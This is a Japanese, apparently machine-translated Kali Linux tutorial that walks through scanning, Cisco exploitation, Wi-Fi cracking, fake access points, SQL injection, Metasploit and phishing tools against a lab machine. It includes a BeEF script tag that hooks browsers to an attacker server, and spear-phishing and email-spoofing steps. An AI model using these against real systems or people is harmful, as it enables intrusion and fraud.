Kali-linux-quick-guide
Kali Linux-インストールと構成
Kali Linuxは、倫理的なハッカーにとって最高のセキュリティパッケージの1つであり、カテゴリごとに分けられたツールセットが含まれています。 これはオープンソースであり、公式Webページはhttps://www.kali.org/[[[1]]]です。
一般的に、Kali Linuxは、次のセクションで説明する仮想マシンとして、オペレーティングシステムとしてマシンにインストールできます。 Kali Linuxのインストールは、ツールを機能させたり組み合わせたりするためのより多くのオプションを提供するため、実用的なオプションです。 ライブブートCDまたはUSBを作成することもできます。 これらはすべて、次のリンクで確認できます。https://www.kali.org/downloads/
*BackTrack* はKali Linuxディストリビューションの古いバージョンでした。 最新リリースはKali 2016.1で、非常に頻繁に更新されます。
Kali Linuxをインストールするには-
- 最初に、仮想ボックスをダウンロードしてインストールします。
- 後で、Kali Linuxディストリビューションをダウンロードしてインストールします。
Virtual Boxをダウンロードしてインストールする
Virtual Boxは、Kali Linuxで不明な点をテストする場合に特に役立ちます。 Virtual BoxでKali Linuxを実行すると、未知のパッケージを試したり、コードをテストしたりするときに安全です。
Virtual Boxの助けを借りて、MACまたはWindowsまたは別の種類のLinuxが可能なプライマリOSとともに、Kali Linuxをシステムに(ハードディスクに直接ではなく)インストールできます。
システムにVirtual Boxをダウンロードしてインストールする方法を理解しましょう。
- ステップ1 *-ダウンロードするには、https://www.virtualbox.org/wiki/Downloadsにアクセスします。 オペレーティングシステムに応じて、適切なパッケージを選択します。 この場合、次のスクリーンショットに示すように、Windows用の最初のものになります。
- ステップ2 *-[次へ]をクリックします。
- ステップ3 *-次のページでは、アプリケーションをインストールする場所を選択するオプションが提供されます。 この場合、デフォルトのままにして、[次へ]をクリックします。
- ステップ4 *-[次へ]をクリックすると、次の[カスタムセットアップ]スクリーンショットがポップアップ表示されます。 インストールする機能を選択して、「次へ」をクリックします。
- ステップ5 *-*はい*をクリックして、インストールを続行します。
- ステップ6 *-[インストールの準備完了]画面が表示されます。 インストールをクリックします。
- ステップ7 *-*完了*ボタンをクリックします。
次のスクリーンショットに示すように、Virtual Boxアプリケーションが開きます。 これで、このマニュアルの残りのホストをインストールする準備ができました。これは、専門的な使用にも推奨されます。
Kali Linuxをインストールする
Virtual Boxを正常にインストールできたので、次のステップに進み、Kali Linuxをインストールします。
- ステップ1 *-公式ウェブサイトからKali Linuxパッケージをダウンロードします:https://www.kali.org/downloads/
ステップ2 *-次のスクリーンショットに示すように、 VirtualBox→新規*をクリックします。
- ステップ3 *-正しい*仮想ハードディスクファイル*を選択し、*開く*をクリックします。
- ステップ4 *-次のスクリーンショットが表示されます。 [作成]ボタンをクリックします。
ステップ5 *-Kali OSを起動します。 デフォルトのユーザー名は *root で、パスワードは toor です。
カーリーを更新
機能を維持するには、Kali Linuxとそのツールを新しいバージョンに更新し続けることが重要です。 Kaliを更新する手順は次のとおりです。
- ステップ1 *-アプリケーション→ターミナルに移動します。 次に、「apt-get update」と入力すると、次のスクリーンショットに示すように更新が行われます。
- ステップ2 *-ツールをアップグレードするには、「apt-get upgrade」と入力すると、新しいパッケージがダウンロードされます。
ステップ3 *-続行するかどうか尋ねられます。 *「Y」*および「Enter」*と入力します。
ステップ4 *-オペレーティングシステムの新しいバージョンにアップグレードするには、“ apt-get distupgrade” *と入力します。
実験室のセットアップ
このセクションでは、Kali Linuxのツールを使用してテストを実行する別のテストマシンをセットアップします。
ステップ1 *-Linuxマシンである *Metasploitable をダウンロードします。 Rapid7 の公式ウェブページからダウンロードできます:https://information.rapid7.com/metasploitable-downloadl?LS=1631875&CS=web[https://information.rapid7.com/metasploitabledownloadl?LS=1631875&CS=web ]
- ステップ2 *-詳細を入力して登録します。 上記のフォームに記入した後、ソフトウェアをダウンロードできます。
ステップ3 *- VirtualBox→新規*をクリックします。
ステップ4 *-「既存の仮想ハードディスクファイルを使用する」をクリックします。 *Metasploitable をダウンロードしたファイルを参照し、 Open をクリックします。
- ステップ5 *-仮想マシンを作成する画面が表示されます。 「作成」をクリックします。
デフォルトのユーザー名は msfadmin で、パスワードは msfadmin です。
Kali Linux-情報収集ツール
この章では、Kali Linuxの情報収集ツールについて説明します。
NMAPおよびZenMAP
NMAPとZenMAPは、Kali Linuxでの倫理的ハッキングのスキャンフェーズに役立つツールです。 NMAPとZenMAPは実質的に同じツールですが、ZMAPにはGUIがありますが、NMAPはコマンドラインを使用します。
NMAPは、ネットワーク検出とセキュリティ監査のための無料のユーティリティツールです。 多くのシステムおよびネットワーク管理者は、ネットワークインベントリ、サービスアップグレードスケジュールの管理、ホストまたはサービスのアップタイムの監視などのタスクにも役立ちます。
NMAPは、ネットワーク上で利用可能なホスト、ホストが提供するサービス(アプリケーション名とバージョン)、実行しているオペレーティングシステム(およびOSバージョン)、パケットフィルター/ファイアウォールの種類を決定するために、生のIPパケットを斬新な方法で使用します使用中など
それでは、一歩ずつ進み、NMAPとZenMAPの使用方法を学びましょう。
- ステップ1 *-開くには、アプリケーション→01-情報収集→nmapまたはzenmapに移動します。
- ステップ2 *-次のステップは、ターゲットホストのOSタイプ/バージョンを検出することです。 NMAPが示すヘルプに基づいて、OSタイプ/バージョン検出のパラメーターは変数「-O」です。 詳細については、次のリンクを使用してください。https://nmap.org/book/man-os-detectionl
使用するコマンドは次のとおりです-
nmap -O 192.168.1.101
次のスクリーンショットは、Nmap出力を表示するために上記のコマンドを入力する必要がある場所を示しています-
- ステップ3 *-次に、TCPおよびUDPポートを開きます。 NMAPに基づいてすべてのTCPポートをスキャンするには、次のコマンドを使用します-
nmap -p 1-65535 -T4 192.168.1.101
パラメータ「-p」は、スキャンする必要があるすべてのTCPポートを示します。 この場合、すべてのポートをスキャンしています。「-T4」は、NMAPを実行する必要があるスキャンの速度です。
結果は次のとおりです。 緑はすべてのTCPオープンポートで、赤はすべてのクローズポートです。 ただし、リストが長すぎるため、NMAPは表示されません。
ステルススキャン
ステルススキャンまたはSYNは、TCPスリーウェイハンドシェイクを完了しないため、 half-open scan とも呼ばれます。 ハッカーはSYNパケットをターゲットに送信します。 SYN/ACKフレームが受信された場合、ターゲットが接続を完了し、ポートがリッスンしていると想定されます。 ターゲットからRSTを受信した場合、ポートがアクティブでないか、閉じていると見なされます。
実際にSYNスキャンを確認するには、NMAPでパラメーター –sS を使用します。 以下は完全なコマンドです-
nmap -sS -T4 192.168.1.101
次のスクリーンショットは、このコマンドの使用方法を示しています-
Searchsploit
Searchsploitは、Kali LinuxユーザーがExploitデータベースアーカイブからコマンドラインで直接検索できるようにするツールです。
それを開くには、次のスクリーンショットに示すように、アプリケーション→08-エクスプロイトツール→searchsploitに移動します。
ターミナルを開いた後、「 searchsploit exploit index name 」と入力します。
DNSツール
このセクションでは、Kaliが組み込んだDNSツールの使用方法を学習します。 基本的に、これらのツールはゾーン転送またはドメインIP解決の問題に役立ちます。
dnsenum.pl
最初のツールは dnsenum.pl で、これはMX、A、およびその他のレコードをドメインに接続するのに役立つPERLスクリプトです。
左側のパネルでターミナルをクリックします。
- 「dnsenum domain name」*と入力すると、すべてのレコードが表示されます。 この場合、Aレコードが表示されます。
DNSMAP
2番目のツールは DNSMAP で、このドメインに接続されている電話番号、連絡先、およびその他のサブドメインを検索するのに役立ちます。 以下はその一例です。
上のセクションのように端末をクリックし、*「dnsmap domain name」*と入力します
dnstracer
3番目のツールは dnstracer です。これは、特定のドメインネームサーバー(DNS)が特定のホスト名の情報を取得する場所を決定します。
上のセクションのようにターミナルをクリックし、「「dnstracerドメイン名」」と入力します。
LBDツール
LBD(Load Balancing Detector)ツールは、特定のドメインがDNSおよび/またはHTTPの負荷分散を使用しているかどうかを検出するため、非常に興味深いツールです。 サーバーが2つある場合、どちらか一方が更新されず、それを悪用しようとする可能性があるため、重要です。 それを使用する手順は次のとおりです-
最初に、左側のパネルでターミナルをクリックします。
次に、「 "lbd domainname" 」と入力します。 結果が「FOUND」として生成される場合、サーバーに負荷バランスがあることを意味します。 この場合、結果は「NOT FOUND」です。
Hping3
Hping3は、倫理的なハッカーによって広く使用されています。 pingツールとほぼ同じですが、ファイアウォールフィルターをバイパスし、TCP、UDP、ICMP、およびRAW-IPプロトコルを使用できるため、より高度です。 tracerouteモードと、対象のチャネル間でファイルを送信する機能があります。
左側のパネルでターミナルをクリックします。
- “ hping3 –h” *と入力すると、このコマンドの使用方法が表示されます。
他のコマンドは*「hping3ドメインまたはIPパラメーター」*
Kali Linux-脆弱性分析ツール
この章では、デバイスやアプリケーションを利用してアクセスするのに役立つツールの使用方法を学習します。
シスコツール
Kaliには、Ciscoルーターを活用するために使用できるツールがいくつかあります。 そのようなツールの1つは、マススキャン、フィンガープリント、および悪用に使用される Cisco-torch です。
左ペインをクリックして、ターミナルコンソールを開きましょう。
次に、「* cisco-torch –parameter IP of host」*と入力します。悪用するものが見つからない場合は、次の結果が表示されます。
使用できるパラメータを確認するには、*“ cisco-torch?” *と入力します
シスコ監査ツール
これは、一般的な脆弱性についてCiscoルーターをスキャンするPERLスクリプトです。 それを使用するには、前のセクションで示したように左ペインでターミナルを再度開き、*“ CAT –hホスト名またはIP” *と入力します。
次のスクリーンショットに示すように、ポートパラメータ*“-p” *を追加できます。この場合、23がブルートフォースになります。
Cisco Global Exploiter
Cisco Global Exploiter(CGE)は、高度でシンプルかつ高速なセキュリティテストツールです。 これらのツールを使用すると、次のスクリーンショットに示すように、いくつかのタイプの攻撃を実行できます。 ただし、実際の環境でテストする場合は、一部がシスコのデバイスをクラッシュさせる可能性があるため注意してください。 たとえば、オプションOptionはサービスを停止できます。
このツールを使用するには、「cge.pl IPaddress 脆弱性の数」と入力します
次のスクリーンショットは、上記リストの脆弱性番号3に対してCiscoルーターで実行されたテストの結果を示しています。 結果は、脆弱性が悪用されたことを示しています。
BED
BEDは、デーモンの潜在的なバッファオーバーフロー、フォーマット文字列などをチェックするように設計されたプログラムです。 al.
この場合、IP 192.168.1.102 およびプロトコルHTTPでテストマシンをテストします。
コマンドは*“ bed –s HTTP –t 192.168.1.102” *になり、テストが続行されます。
Kali Linux-ワイヤレス攻撃
この章では、Kali Linuxに組み込まれているWi-Fiクラッキングツールの使用方法を学習します。 ただし、使用しているワイヤレスカードが監視モードをサポートしていることが重要です。
シダWifiクラッカー
Fern Wifiクラッカーは、Kaliがワイヤレスを解読するためのツールの1つです。
Fernを開く前に、ワイヤレスカードを監視モードに切り替える必要があります。 これを行うには、ターミナルで*「airmon-ng start wlan-0」*と入力します。
次に、Fern Wireless Crackerを開きます。
- ステップ1 *-アプリケーション→[ワイヤレス攻撃]→[シダワイヤレスクラッカー]をクリックします。
- ステップ2 *-次のスクリーンショットに示すように、ワイヤレスカードを選択します。
- ステップ3 *-[アクセスポイントのスキャン]をクリックします。
- ステップ4 *-スキャンが完了すると、見つかったすべてのワイヤレスネットワークが表示されます。 この場合、「WPAネットワーク」のみが見つかりました。
- ステップ5 *-上記のスクリーンショットに示すように、WPAネットワークをクリックします。 見つかったすべてのワイヤレスが表示されます。 一般的に、WPAネットワークでは、辞書攻撃を実行します。
- ステップ6 *-[参照]をクリックして、攻撃に使用するワードリストを見つけます。
- ステップ7 *-「Wifi攻撃」をクリックします。
- ステップ8 *-辞書攻撃を完了した後、パスワードを検出し、次のスクリーンショットの図に示すように表示されます。
キスメット
Kismetは、WIFIネットワーク分析ツールです。 これは、802.11レイヤー2ワイヤレスネットワーク検出器、スニファー、および侵入検出システムです。 rawモニタリング(rfmon)モードをサポートし、802.11a/b/g/nトラフィックをスニッフィングできるワイヤレスカードで動作します。 パケットと隠しネットワークを収集することにより、ネットワークを識別します。
それを使用するには、ワイヤレスカードを監視モードに切り替え、これを行うには、ターミナルで*「airmon-ng start wlan-0」*と入力します。
このツールの使用方法を学びましょう。
- ステップ1 *-起動するには、ターミナルを開いて「kismet」と入力します。
- ステップ2 *-[OK]をクリックします。
- ステップ3 *-Kismetサーバーの起動を要求するメッセージが表示されたら、[はい]をクリックします。 そうでない場合、機能を停止します。
- ステップ4 *-起動オプション、デフォルトのままにします。 「開始」をクリックします。
- ステップ5 *-ワイヤレスカードの定義を求めるテーブルが表示されます。 そのような場合は、「はい」をクリックします。
ステップ6 *-この場合、無線ソースは“ wlan0” *です。 *「Intf」*セクションに記述する必要があります→「追加」をクリックします。
- ステップ7 *-次のスクリーンショットに示すように、WiFiネットワークのスニッフィングを開始します。
- ステップ8 *-任意のネットワークをクリックすると、次のスクリーンショットに示すようにワイヤレスの詳細が生成されます。
GISKismet
GISKismetは、Kismetを使用して収集したデータを実用的な方法で表すためのワイヤレス視覚化ツールです。 GISKismetは情報をデータベースに保存するため、SQLを使用してデータを照会し、グラフを生成できます。 GISKismetは現在、データベースにSQLiteを、グラフにGoogleEarth/KMLファイルを使用しています。
このツールの使用方法を学びましょう。
- ステップ1 *-GISKismetを開くには、[アプリケーション]→[ワイヤレス攻撃]をクリックして、giskismetに移動します。
前のセクションで覚えているように、Kismetツールを使用して、ワイヤレスネットワークに関するデータと、このすべてのデータKismetパックをnetXMLファイルに探索しました。
- ステップ2 *-このファイルをGiskismetにインポートするには、「root@ kali:〜#giskismet -x Kismetfilename.netxml」と入力すると、ファイルのインポートが開始されます。
インポートしたら、前に見つけたホットスポットをGoogle Earthにインポートできます。
- ステップ3 *-Google Earthが既にインストールされていると仮定して、[ファイル]→[Giskismetが作成したファイルを開く]→[開く]をクリックします。
次のマップが表示されます。
ゴーストフィッシャー
Ghost Phisherは、偽の無線アクセスポイントを作成し、後でMan-in-The-Middle-Attackを作成するのに役立つ人気のあるツールです。
- ステップ1 *-アプリケーションを開くには、[アプリケーション]→[ワイヤレス攻撃]→[ゴーストフィッシング]をクリックします。
- ステップ2 *-開いた後、次の詳細を使用して偽のAPをセットアップします。
- ワイヤレスインターフェイス入力:wlan0
- SSID:ワイヤレスAP名
- IPアドレス:APが持つIP
- WAP:接続するためのこのSSIDを持つパスワード
- ステップ3 *-*スタート*ボタンをクリックします。
Wifite
これは、複数のWEP、WPA、およびWPS暗号化ネットワークを連続して攻撃する別のワイヤレスクラッキングツールです。
まず、ワイヤレスカードは監視モードにする必要があります。
- ステップ1 *-それを開くには、アプリケーション→ワイヤレス攻撃→Wifiteに進みます。
ステップ2 *- "wifite –showb" *と入力して、ネットワークをスキャンします。
- ステップ3 *-ワイヤレスネットワークへの攻撃を開始するには、Ctrl + Cをクリックします。
- ステップ4 *-「1」を入力して、最初のワイヤレスをクラックします。
- ステップ5 *-攻撃が完了すると、キーが見つかります。
Kali Linux-ウェブサイト侵入テスト
この章では、Kali Linuxが提供するWebサイト侵入テストについて学習します。
Vegaの使用法
Vegaは、Webアプリケーションのセキュリティをテストするための無料のオープンソーススキャナーおよびテストプラットフォームです。 Vegaは、SQLインジェクション、クロスサイトスクリプティング(XSS)、不注意で公開された機密情報、およびその他の脆弱性を見つけて検証するのに役立ちます。 JavaベースのGUIで記述され、Linux、OS X、およびWindowsで実行されます。
Vegaには、迅速なテスト用の自動スキャナーと、戦術検査用のインターセプトプロキシが含まれています。 Vegaは、Web言語であるJavaScriptの強力なAPIを使用して拡張できます。 公式ウェブページはhttps://subgraph.com/vega/です
- ステップ1 *-Vegaを開くには、アプリケーション→03-Web Application Analysis→Vegaに移動します
- ステップ2 *-パスにアプリケーションが表示されない場合は、次のコマンドを入力します。
- ステップ3 *-スキャンを開始するには、「+」記号をクリックします。
- ステップ4 *-スキャンするWebページのURLを入力します。 この場合、それはメタスプロイタブルマシンです→「次へ」をクリックします。
- ステップ5 *-制御するモジュールのすべてのボックスをオンにします。 次に、「次へ」をクリックします。
- ステップ6 *-次のスクリーンショットで「次へ」をもう一度クリックします。
- ステップ7 *-「完了」をクリックします。
- ステップ8 *-次の表が表示されたら、[はい]をクリックします。
次のスクリーンショットに示すように、スキャンが続行されます。
- ステップ9 *-スキャンが完了した後、左下のパネルにすべての結果が表示され、重大度に従って分類されます。 クリックすると、右側のパネルに「リクエスト」、「ディスカッション」、「インパクト」、「修復」などの脆弱性の詳細がすべて表示されます。
ZapProxy
ZAP-OWASP Zed Attack Proxyは、Webアプリケーションの脆弱性を見つけるための使いやすい統合侵入テストツールです。 これはJavaインターフェースです。
- ステップ1 *-ZapProxyを開くには、アプリケーション→03-Web Application Analysis→owaspzapに移動します。
- ステップ2 *-[同意する]をクリックします。
ZAPのロードが開始されます。
- ステップ3 *-次のスクリーンショットに示すように、オプションのいずれかを選択し、「開始」をクリックします。
次のWebはIPでメタスプロイタブルです:192.168.1.101
- ステップ4 *-「攻撃するURL」でテストWebのURLを入力し、「攻撃」をクリックします。
スキャンが完了すると、左上のパネルにすべてのクロールされたサイトが表示されます。
左パネルの「アラート」に、すべての結果と説明が表示されます。
- ステップ5 *-「スパイダー」をクリックすると、すべてのリンクがスキャンされます。
データベースツールの使用
sqlmap
sqlmapは、SQLインジェクションの欠陥を検出して活用し、データベースサーバーを乗っ取るプロセスを自動化するオープンソースの侵入テストツールです。 強力な検出エンジン、究極のペネトレーションテスターの多くのニッチ機能、データベースフィンガープリンティング、データベースからのデータフェッチ、基盤となるファイルシステムへのアクセス、およびオペレーティングシステム上でのコマンド実行までの幅広いスイッチが付属しています。帯域接続。
sqlmapの使用方法を学びましょう。
- ステップ1 *-sqlmapを開くには、アプリケーション→04-データベース評価→sqlmapに移動します。
SQLインジェクションに対して脆弱なパラメータを持つWebページはメタスプロイタブルです。
ステップ2 *-SQLインジェクションテストを開始するには、「sqlmap – u URL ofvictim」*と入力します。
- ステップ3 *-結果から、いくつかの変数が脆弱であることがわかります。
sqlninja
sqlninjaは、完全なGUIアクセスに対するMicrosoft SQL Server上のSQLインジェクションです。 sqlninjaは、Microsoft SQL Serverをバックエンドとして使用するWebアプリケーションでSQLインジェクションの脆弱性を悪用することを目的としたツールです。 このツールに関する完全な情報は、http://sqlninja.sourceforge.net/にあります。
- ステップ1 *-sqlninjaを開くには、アプリケーション→04-データベース評価→sqlninjaに移動します。
CMSスキャンツール
WPScan
WPScanは、セキュリティの問題を見つけるためにリモートWordPressインストールをスキャンするために使用できるブラックボックスWordPress脆弱性スキャナーです。
- ステップ1 *-WPscanを開くには、アプリケーション→03-Web Application Analysis→「wpscan」に移動します。
次のスクリーンショットが表示されます。
ステップ2 *-Webサイトの脆弱性をスキャンするには、“ wpscan –u URL of webpage” *と入力します。
スキャナーが更新されていない場合、更新するように求められます。 私はそれを行うことをお勧めします。
スキャンが開始されると、結果が表示されます。 次のスクリーンショットでは、脆弱性は赤い矢印で示されています。
Joomscan
Joomlaは、その柔軟性により、おそらく最も広く使用されているCMSです。 このCMSでは、Joomlaスキャナーです。 これは、Web開発者とWebマスターが、展開されたJoomlaサイトで考えられるセキュリティ上の弱点を特定するのに役立ちます。
ステップ1 *-開くには、ターミナルの左パネルをクリックし、「joomscan – parameter」*をクリックします。
ステップ2 *-使用タイプのヘルプを取得するには“ joomscan/?” *
- ステップ3 *-スキャンを開始するには、「被害者のjoomscan -u URL」と入力します。
次のスクリーンショットに示すように、結果が表示されます。
SSLスキャンツール
*TLSSLed* は、ターゲットSSL/TLS(HTTPS)Webサーバー実装のセキュリティを評価するために使用されるLinuxシェルスクリプトです。 これは、sslssl、opensslライブラリに基づく完全なSSL/TLSスキャナー、および*“ openssl s_client” *コマンドラインツールに基づいています。
現在のテストには、ターゲットがSSLv2プロトコル、NULL暗号、キー長(40または56ビット)に基づく弱い暗号、強力な暗号(AESなど)の可用性、デジタル証明書がMD5署名の場合、および現在のSSL/TLS再ネゴシエーション機能。
テストを開始するには、ターミナルを開いて*「tlssled URL port」*と入力します。 データを見つけるために証明書のテストを開始します。
次のスクリーンショットに緑で示されているように、証明書は2018年まで有効であるという調査結果からわかります。
w3af
w3afは、すべてのWebアプリケーションの脆弱性を特定して悪用することを目的としたWebアプリケーション攻撃および監査フレームワークです。 このパッケージは、フレームワークのグラフィカルユーザーインターフェイス(GUI)を提供します。 コマンドラインアプリケーションのみが必要な場合は、w3af-consoleをインストールします。
このフレームワークは「ウェブ向けのメタスプロイト」と呼ばれていますが、ブラックボックススキャン技術を使用してウェブアプリケーションの脆弱性を発見するため、実際にははるかに多くの機能を備えています。 w3afコアとそのプラグインは完全にPythonで書かれています。 このプロジェクトには130を超えるプラグインがあり、SQLインジェクション、クロスサイトスクリプティング(XSS)、リモートファイルインクルードなどを識別して活用します。
- ステップ1 *-開くには、アプリケーション→03-Web Application Analysis→w3afをクリックします。
- ステップ2 *-「ターゲット」で、被害者のURLを入力します。この場合、メタスプロイタブルWebアドレスになります。
- ステップ3 *-プロファイルを選択→[開始]をクリックします。
- ステップ4 *-「結果」に移動すると、詳細とともに結果が表示されます。
Kali Linux-悪用ツール
この章では、Kali Linuxが提供するさまざまな活用ツールについて学びます。
メタスプロイト
前述したように、MetasploitはRapid7の製品であり、ほとんどのリソースはWebページhttps://www.metasploit.com./[www.metasploit.com]にあります。 商用版と無料版の2つのバージョンがあります。 したがって、これら2つのバージョンの違いはそれほど大きくありません。この場合、コミュニティバージョン(無料)を使用します。
倫理的ハッカーとして、Metasploitコミュニティバージョンが埋め込まれた「Kali Ditribution」と、インストール時間を節約することで非常に快適な他の倫理的ハッキングツールを使用します。 ただし、別のツールとしてインストールする場合は、Linux、Windows、OS Xなどのオペレーティングシステムにインストールできるアプリケーションです。
最初に、KaliでMetasploit Consoleを開きます。 次に、アプリケーション→エクスプロイトツール→Metasploitに移動します。
起動すると、次の画面が表示され、Metasploitのバージョンに赤の下線が引かれます。
コンソールで、ヘルプまたは?を使用する場合 記号を使用すると、MSPのコマンドとその説明のリストが表示されます。 ニーズと使用するものに基づいて選択できます。
別の重要な管理コマンドは msfupdate で、これは最新の脆弱性エクスプロイトでメタスプロイトを更新するのに役立ちます。 コンソールでこのコマンドを実行した後、更新が完了するまで数分待つ必要があります。
次のスクリーンショットに示すように、「検索」と呼ばれる優れたコマンドを使用して、必要なものを見つけることができます。 たとえば、Microsoftに関連するエクスプロイトを検索する場合、コマンドは msf> search name:Microsoft type:exploit になります。
ここで、「search」はコマンド、「name」は探しているオブジェクトの名前、「type」は探しているスクリプトの種類です。
別のコマンドは「info」です。 使用されるモジュールまたはプラットフォーム、作成者、脆弱性リファレンス、およびこれが持つことができるペイロード制限に関する情報を提供します。
アーミテージ
metasploitのArmitage GUIは、metasploitの補完ツールです。 ターゲットを視覚化し、エクスプロイトを推奨し、高度な悪用後の機能を公開します。
開いてみましょうが、最初にmetasploitコンソールを開いて起動する必要があります。 アーミテージを開くには、アプリケーション→エクスプロイトツール→アーミテージに移動します。
次のスクリーンショットに示すように、[接続]ボタンをクリックします。
開くと、次の画面が表示されます。
アーミテージはユーザーフレンドリーです。 「ターゲット」エリアには、発見したすべてのマシンと作業中のマシンが一覧表示されます。ハッキングされたターゲットは赤色で雷雨が発生しています。
ターゲットをハッキングした後、ターゲットを右クリックして、フォルダーの探索(参照)など、必要な操作を続けて探索できます。
次のGUIには、コンソールと呼ばれるフォルダーのビューが表示されます。 フォルダをクリックするだけで、metasploitコマンドを必要とせずにフォルダ間を移動できます。
GUIの右側には、脆弱性のモジュールがリストされているセクションがあります。
BeEF
BeEFは Browser Exploitation Framework の略です。 これは、Webブラウザーに焦点を当てた侵入テストツールです。 BeEFを使用すると、プロの侵入テスターは、クライアント側の攻撃ベクトルを使用して、ターゲット環境の実際のセキュリティ状態を評価できます。
まず、次のコマンドを使用してKaliパッケージを更新する必要があります-
root@kali:/# apt-get update
root@kali:/# apt-get install beef-xss
開始するには、次のコマンドを使用します-
root@kali:/# cd/usr/share/beef-xss
root@kali:/# ./beef
ブラウザを開き、ユーザー名とパスワードを入力します: beef 。
BeEFフックは、クライアントブラウザで実行する必要があるBeEFサーバーでホストされるJavaScriptファイルです。 実行すると、ターゲットに関する多くの情報を通信するBeEFサーバーにコールバックします。 また、追加のコマンドとモジュールをターゲットに対して実行することもできます。 この例では、 BeEF フックの場所は http://192.168.1.101:3000/hook.js です。
ブラウザーを攻撃するには、クライアントが表示するページにJavaScriptフックを含めます。 それにはいくつかの方法がありますが、最も簡単な方法は、ページに次を挿入し、何らかの方法でクライアントにそれを開かせることです。
<script src = "http://192.168.1.101:3000/hook.js" type = "text/javascript"></script>
ページが読み込まれたら、BeEFコントロールパネルに戻り、左上の[オンラインブラウザ]をクリックします。 数秒後、フックされたブラウザを表すIPアドレスポップアップが表示されます。 IPにカーソルを合わせると、ブラウザのバージョン、オペレーティングシステム、インストールされているプラグインなどの情報がすぐに提供されます。
コマンドをリモートで実行するには、「所有」ホストをクリックします。 次に、コマンドで実行するモジュールをクリックし、最後に「実行」をクリックします。
Linux Exploit Suggester
Linuxオペレーティングシステムのリリースバージョン 'uname -r' が与えられると、悪用の可能性が示唆されます。
それを実行するには、次のコマンドを入力します-
root@kali:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0
*3.0.0* は、利用したいLinux OSのカーネルバージョンです。
Kali Linux-フォレンジックツール
この章では、Kali Linuxで利用可能なフォレンジックツールについて学習します。
p0f
*p0f* は、問題のデバイスがパケットファイアウォールの背後にある場合でも、キャプチャしたパケットを調べるだけで、ターゲットホストのオペレーティングシステムを識別することができるツールです。 P0fは、直接または間接の追加のネットワークトラフィックを生成しません。名前検索なし;神秘的なプローブはありません。 ARINクエリなし。何もない。 上級ユーザーの手で、P0fはファイアウォールの存在、NATの使用、およびロードバランサーの存在を検出できます。
ターミナルで*“ p0f – h” *と入力して使用方法を確認すると、次の結果が得られます。
使用可能なインターフェースもリストされます。
次に、次のコマンドを入力します:*“ p0f –i eth0 –p -o filename” *。
パラメータ "-i" は、上記のインターフェイス名です。 "-p" は、混合モードであることを意味します。 "-o" は、出力がファイルに保存されることを意味します。
アドレス192.168.1.2のWebページを開きます
結果から、Webサーバーがapache 2.xを使用しており、OSがDebianであることがわかります。
pdf-parser
pdf-parserは、PDFドキュメントを解析して、分析されたpdfファイルで使用される基本的な要素を識別するツールです。 PDFドキュメントはレンダリングされません。 PDFパーサーのテキストブックケースにはお勧めしませんが、作業は完了します。 通常、これは、スクリプトが埋め込まれている疑いがあるpdfファイルに使用されます。
コマンドは-
pdf-parser -o 10 filepath
「-o」はオブジェクトの数です。
次のスクリーンショットでわかるように、pdfファイルはCMDコマンドを開きます。
ダンプジラ
DumpzillaアプリケーションはPython 3.xで開発され、Firefox、Iceweasel、およびSeamonkeyブラウザーのすべての法医学的に興味深い情報を抽出して抽出することを目的としています。
救助
1つのファイルまたはブロックデバイス(ハードディスク、cdromなど)から別のデバイスにデータをコピーし、読み取りエラーが発生した場合に最初に適切な部分をレスキューしようとします。
ddrescueの基本操作は完全に自動化されています。 つまり、エラーを待ったり、プログラムを停止したり、新しい位置から再起動したりする必要はありません。
ddrescueのmapfile機能を使用すると、データは非常に効率的にレスキューされます(必要なブロックのみが読み取られます)。 また、いつでもレスキューを中断して、同じ時点で後で再開できます。 マップファイルは、ddrescueの有効性の重要な部分です。 自分がしていることがわからない場合は使用してください。
コマンドラインは-
dd_rescue infilepath outfilepath
パラメーター "– v" は詳細を意味します。 "/dev/sdb" はレスキューされるフォルダーです。 * imgファイル*は復元されたイメージです。
DFF
ファイルを回復するために使用されるもう1つのフォレンジックツールです。 GUIもあります。 それを開くには、ターミナルで*「dff-gui」*と入力すると、次のWeb GUIが開きます。
[ファイル]→[証拠を開く]をクリックします。
次の表が開きます。 「Raw format」にチェックマークを付け、「+」をクリックして、復元するフォルダーを選択します。
次に、ペインの左側のファイルを参照して、回復された内容を確認できます。
Kali Linux-ソーシャルエンジニアリング
この章では、Kali Linuxで使用されるソーシャルエンジニアリングツールについて学習します。
ソーシャルエンジニアリングツールキットの使用
*Social-Engineer Toolkit* (SET)は、ソーシャルエンジニアリング用に設計されたオープンソースの侵入テストフレームワークです。 SETには、短時間で信じられないほどの攻撃を行うことができるカスタム攻撃ベクトルが多数あります。 これらの種類のツールは、人間の振る舞いを使用して攻撃ベクトルに誘導します。
ソーシャルエンジニアツールキットの使用方法を学びましょう。
- ステップ1 *-SETを開くには、アプリケーション→ソーシャルエンジニアリングツール→ソーシャルエンジニアリングツールの[設定]をクリックします。
ステップ2 *-使用条件に同意するかどうかを尋ねます。 次のスクリーンショットに示すように、「y」*と入力します。
- ステップ3 *-次のスクリーンショットに示されているメニューのほとんどは自明であり、その中で最も重要なのはナンバー1の「ソーシャルエンジニアリング攻撃」です。
ステップ4 *-「1」と入力して、Enterを押します。 サブメニューが開きます。 もう一度 *Enter ボタンを押すと、各サブメニューの説明が表示されます。
スピアフィッシングモジュールを使用すると、電子メールメッセージを特別に作成し、 FileFormatmalicious ペイロードを添付して標的の被害者に送信できます。 たとえば、悪意のあるPDFドキュメントを送信すると、被害者が開くとシステムが危険にさらされます。 メールアドレスを偽装する場合は、「Sendmail」がインストールされていることを確認し(apt-get install sendmail)、config/set_config SENDMAIL = OFFフラグをSENDMAIL = ONに変更します。
スピアフィッシング攻撃には2つのオプションがあります-
- 大量メール攻撃を実行する
- FileFormatペイロードとソーシャルエンジニアリングテンプレートを作成する
1つ目はSETにすべてを行わせること(オプション1)、2つ目は独自のFileFormatペイロードを作成し、独自の攻撃で使用することです。
「99」*と入力してメインメニューに戻り、「 2」*と入力して「Web攻撃ベクトル」に移動します。
Web攻撃モジュールは、複数のWebベースの攻撃を利用して、対象となる被害者を侵害するユニークな方法です。 このモジュールは、被害者がリンクをクリックした場合に被害者に対してフィッシング攻撃を実行することで使用されます。 リンクをクリックすると、さまざまな攻撃が発生する可能性があります。
“ 99” *を入力してメインメニューに戻り、“ 3” *を入力します。
